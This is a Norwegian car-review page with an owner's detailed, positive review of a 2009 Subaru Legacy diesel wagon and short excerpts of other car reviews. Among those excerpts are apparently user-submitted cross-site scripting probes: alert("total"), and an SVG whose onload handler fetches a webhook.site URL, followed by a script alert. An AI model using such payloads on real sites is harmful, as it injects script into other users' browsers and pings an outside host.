Hvilken bil ser du etter?

Tilbake til front | Skriv en vurdering
2009 Subaru Legacy 2.0D PREMIUM Stasjonsvogn Diesel

Score 9.4/10

Problemfritt , pålitelig og meget rimelig bilhold, hva gjelder drift, vedlikehold og drivstoffforbruk. En veldig komfortabel og romslig bil med godt med krefter og fantastisk fremkommelighet. Alltid klar til dyst og da også klar for det alle meste og du sitter der og kjører med "lave skuldre" uansett om du vet at det kan være utfordrende kjøreforhold underveis eller bratte bakker opp hjem/hytte.

Kjøreglede

8 / 10
SUBARU OUTBACK - Veldig komfortabel og man kommer uthvilt frem på langtur. Jeg er over 190 cm og setene er akkurat lange nok til at jeg får støtten jeg trenger under låret. Ingen sportsbil, men ligger godt på veien og god kraft i motoren. Med manuell kasse og Subarus AWD- system med kontinuerlig drift på alle hjul og den litt større bakkeklaringen er den fantastisk trygg og stabil på rufsete føre/underlag. Hvordan denne også tar seg frem og opp, (og løs når det trengs), er helt utrolig. Denne "fjellgeita" bare "tøffer" opp og frem der andre med "såkalt 4WD" for lengst har måttet gi opp. Har noen bakker siste biten hjem som fort blir krevende hvis veien ikke er brøytet, så jeg har ofte stor glede og nytte av den utrolige fremkommeligheten til Subaru Outback.

Kvalitet/driftssikkerhet

10 / 10
Ut over bytte av dieselgløderne ved ca 180 000 km, se under "Økonomi/kostnader", absolutt ingenting ut over vanlige slitedeler, alt bare virker og virker og virker... Jeg synes nærlyset nok kunne vært litt sterkere, til gjengjeld er fjernlyset veldig bra. Varsellampe for SRG-filteret begynte å lyse dagen etter at jeg overtok bilen i 2015, (på ca 65 000 km). Ble byttet på bruktbilgarantien fra forhandleren - null stress og ingen krangling - Supersmooth av Møllers på Jessheim! Har etter det kjørt mer enn 150 000 km uten at SRG-filteret har "gitt mer lyd/lys fra seg. (Antar første eier hadde et helt annet kjøremønster enn oss)

Plass/praktiske løsninger

9 / 10
Har alt man trenger her. Poengtrekket her skyldes kun to små ting: 1) Det hadde vært kjekt med "skiluke" i bakseteryggen, Her må en del av det 60/40- baksetet legges ned for ski /annet langt/tynt eller feste på takgrind/takboks. 2) Ikke mulig å åpne bakluken innenfra - har overnattet i bilen ved et par anledninger ifm. reise på idrettsarrangement. Har sovet godt, med krøkkete for en stor og lang mann å åle seg inn/ ut gjennom baksetedøren.. #flisespikkeri. Romslig og god plass, selv om midtsetet bak ikke er allverden. Stort pluss for memoryinnstillinger på det elektrisk justerbare førersetet.

Økonomi/kostnader

10 / 10
Tror man skal slite med å finne billigere og mer problemfritt bilhold enn hva vi har hatt med denne. Satser på minst ytterligere 100 000 km med denne. Byttet clutch og svinghjul, (manuell 5-gir),ved ca 180 000 km og byttet gløderne omtrent samtidig, (slet etterhvert ved kaldstart under 10minus uten bruk av motorvarmer), ellers ingenting annet enn vanlige slitedeler gjennom de drøyt 150 000km vi har hatt bilen. Kjøpte den i 2015 fra forhandler for kr. 210 000. Da hadde den gått ca 65 000 km. Med permanent drift på alle hjul, 50-50, så er den også veldig "snill" når det kommer til dekkslitasje. Dekkene slites veldig jevnt og varer i langt flere kilometer enn hva jeg opplever med vår andre bil som kun er 2wd)

Drivstoff/forbruk

10 / 10
Blandet kjøring 0,54, på langkjøring (3 i bilen og fullt bagasjerom) ned mot 0,44 l/mil. Skulle gjerne hatt 6-trinns manuellkassen som sto i Subaru Forrester Diesel-utgaven fra samme periode, da hadde den nok vært enda gjerrigere på langtur tenker jeg.

Flere vurderinger fra samme generasjon

Subaru Legacy (2014)

Anbefales dersom fremkommelighet vinterstid vektlegges. Jeg har hatt denne bare 3000 km (kjøpt brukt) men bilen oppleves som særdeles god, gode seter, stille og fine kjøreegenskaper.

Score 9.0

Vurdert av HermodG

Subaru Legacy (2013)

Super bil. Ujålete, god på veien og til å stole på når du skal opp til hytta på fjellet og er usikker på om veien er brøytet.

Score 8.6

Vurdert av misty

Subaru Legacy (2011)

God kvalitet og fantastisk på vinterføre

Score 7.2

Vurdert av Concac

Subaru Legacy (2011)

Meget bra bil med gode kjøreegenskaper og driftssikkerhet.

Score 8.4

Vurdert av Knutso

Subaru Legacy (2010)

Solid, trygg og komfortabel bil med manuell gir. Fantastisk på vinterføre! Vurderte outback, men veldig fornøyd med legacy. Bytte av alle glødepluggene på 82000km ble dyrt, og likeledes bytte av

Score 7.8

Vurdert av svein

Subaru Legacy (2010)

Bilen kjøpte jeg som demo-kjørt med 2500km på telleren ,den er i dag kjørt 222.000 km uten store verkstedutgifter , kun skiftet et bakhjulslager og 2 små gummiforinger i bakstillingen . Både jeg

Score 10

Vurdert av stigegil

Subaru Legacy (2010)

Meget god på vinterføre og på dårlige veier. God plass mye utstyr. Solid og stødig bil, billig å eie.

Score 10

Vurdert av Geir

Subaru Legacy (2010)

Dette var den dyreste diesel utgaven den gangen. Heter Sport Premium og kom orginalt med 18", spesiel front, gule bilstein etc. Veldig godt utstyrt. AWD

Score 9.0

Vurdert av Stigen74

Subaru Legacy (2010)

Alt i alt godt fornøyd med bilen, og ville uten problemer anbefalt den.

Score 7.2

Vurdert av bassjohansen

Subaru Legacy (2009)

Kul och god bil att köra men att subaru fick till att laga en sån skitmotor hade jag aldrig trott. Förstörd turbo med motorhavei på köpet var inte kul. Dålig service subaru trondheim.

Score 4.4

Vurdert av MrMinem

Subaru Legacy (2009)

En svært trivelig og solid, driftssikker og lettkjørt bil . Sterk motor med rimelig forbruk. (Bilen er for øvrig en SEDANutgave - noe som ikke var et mulig alternativ da jeg skulle velge modell ov

Score 7.8

Vurdert av KjellA

Flere vurderinger

Citroën e-C4 (2025)

Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve

Score 9.0

Vurdert av Siri

Aston Martin DB9 GT (2017)

alert("total")

Score 5.0

Vurdert av test

Aston Martin DB9 GT (2017)

totalvurderingtest

Score 5.0

Vurdert av test

Abarth 500e (2024)

Score 10

Vurdert av Bernt

Abarth 500e (2024)

Score 1.0

Vurdert av xxxfooo4

Abarth 500e (2024)

xxxfooo4

Score 3.0

Vurdert av xxxfooo4

Abarth 500e (2024)

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>

Score 6.2

Vurdert av Bernt

Volvo EX40 (2026)

Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass

Score 1.6

Vurdert av Jorsalfar1996

Ford Explorer EV (2025)

Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.

Score 8.2

Vurdert av Adams

Ford Kuga (2021)

Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring

Score 8.6

Vurdert av Viggo

Hongqi E-HS9 (2022)

Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!

Score 8.2

Vurdert av MrP85

Mercedes-Benz EQC (2022)

Topp komfort og driftsikker.

Score 9.4

Vurdert av Renna

Polestar 2 (2022)

God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h

Score 8.8

Vurdert av Autofilen

Mercedes-Benz GLE (2020)

Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km

Score 9.6

Vurdert av Hans

BMW 3-Serie (2012)

Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat

Score 8.8

Vurdert av Knappertappen